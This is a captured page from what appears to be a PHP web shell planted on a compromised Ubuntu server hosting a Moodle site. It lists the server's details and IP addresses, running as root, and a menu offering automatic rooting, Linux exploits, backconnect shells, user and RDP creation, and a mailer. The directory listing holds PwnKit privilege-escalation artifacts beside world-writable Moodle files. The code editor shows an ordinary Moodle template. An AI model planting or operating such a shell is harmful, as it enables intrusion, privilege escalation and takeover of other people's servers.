Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
admin /
mnet /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
access_control.php
8.6
KB
-rwxrwxrwx
delete.php
2.25
KB
-rwxrwxrwx
index.php
5.06
KB
-rwxrwxrwx
peer_forms.php
7.88
KB
-rwxrwxrwx
peers.php
10.29
KB
-rwxrwxrwx
profilefields.php
3.2
KB
-rwxrwxrwx
profilefields_form.php
2.82
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
services.php
3.46
KB
-rwxrwxrwx
services_form.php
3.01
KB
-rwxrwxrwx
tabs.php
2.42
KB
-rwxrwxrwx
testclient.php
7.14
KB
-rwxrwxrwx
trustedhosts.html
2.21
KB
-rwxrwxrwx
trustedhosts.php
2.15
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : trustedhosts.html
<?php echo $OUTPUT->header(); ?> <div id="trustedhosts"><!-- See theme/standard/styles_layout.css #trustedhosts .generaltable for rules --> <table cellspacing="0" cellpadding="5" class="generaltable generalbox" > <tr> <th class="header c0" colspan="2"><?php print_string('trustedhosts', 'mnet'); ?></th> </tr> <tr> <td class="cell c1" colspan="2"><?php print_string('trustedhostsexplain', 'mnet'); ?></td> </tr> <tr> <td class="cell c1" colspan="2"> <form method="post" action="trustedhosts.php"> <div> <input type="hidden" name="sesskey" value="<?php echo sesskey() ?>" /> <textarea name="hostlist" cols="40" rows="20"><?php echo $trusted_hosts; ?></textarea><br /> <input type="submit" value="<?php print_string('savechanges'); ?>" /> </div> </form> </td> </tr> </table> <table cellspacing="0" cellpadding="5" class="generaltable generalbox" > <tr> <th class="header c0" colspan="2"><?php print_string('testtrustedhosts', 'mnet'); ?></th> </tr> <?php if (!empty($test_ip_address)){ ?> <tr> <td class="cell c1" colspan="2"> <?php if ($in_range) { print_string('is_in_range', 'mnet', $test_ip_address); echo '<br />'; print_string('validated_by', 'mnet', $validated_by); } else { print_string('not_in_range', 'mnet', $test_ip_address); } ?> </td> </tr> <?php } else { ?> <tr> <td class="cell c1" colspan="2"><?php print_string('testtrustedhostsexplain', 'mnet'); ?></td> </tr> <?php } ?> <tr> <td class="cell c1" colspan="2"> <form method="get" action="trustedhosts.php"> <div> <input type="hidden" name="sesskey" value="<?php echo sesskey() ?>" /> <input type="text" name="testipaddress" value="<?php echo $test_ip_address; ?>" /> <input type="submit" value="<?php print_string('go'); ?>" /> </div> </form> </td> </tr> </table> </div> <?php echo $OUTPUT->footer(); ?>
Close